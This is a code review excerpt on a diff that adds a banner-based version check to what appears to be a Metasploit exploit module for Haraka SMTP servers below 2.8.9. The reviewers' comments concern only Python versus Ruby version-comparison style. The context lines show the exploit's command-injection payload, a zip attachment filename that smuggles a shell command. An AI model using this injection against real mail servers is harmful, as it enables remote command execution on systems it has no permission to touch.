modules/exploits/linux/smtp/haraka.py

```diff
@@ -100,8 +106,31 @@ def create_zip(cmd="touch /tmp/harakiri"):
     z1.append("a\";%s;echo \"a.zip"%cmd, z2.read())
     return(z1.read())
 
+
+def check_banner(args):
+    module.log('{}:{} Starting banner check for Haraka < 2.8.9'.format(args['rhost'], args['rport']), level='debug')
+    c = smtplib.SMTP()
+    (code, banner) = c.connect(args['rhost'], int(args['rport']))
+    c.quit()
+
+    if code == 220 and 'Haraka' in banner:
+        versions = re.findall('(\d+\.\d+\.\d+)', banner)
+        if versions:
+            if StrictVersion(versions[0]) < StrictVersion('2.8.9'):
```

Comment:
I just like how more formal version checking looks than in python, compared to Ruby where you'll usually find the non-intuitive Gem::Version being used.

Reply:
Maybe it's just the ability to elide namespace with `from`

Reply:
Eh, I don't think this any better/worse. You still have to google to find it, and it's in an equivalent place.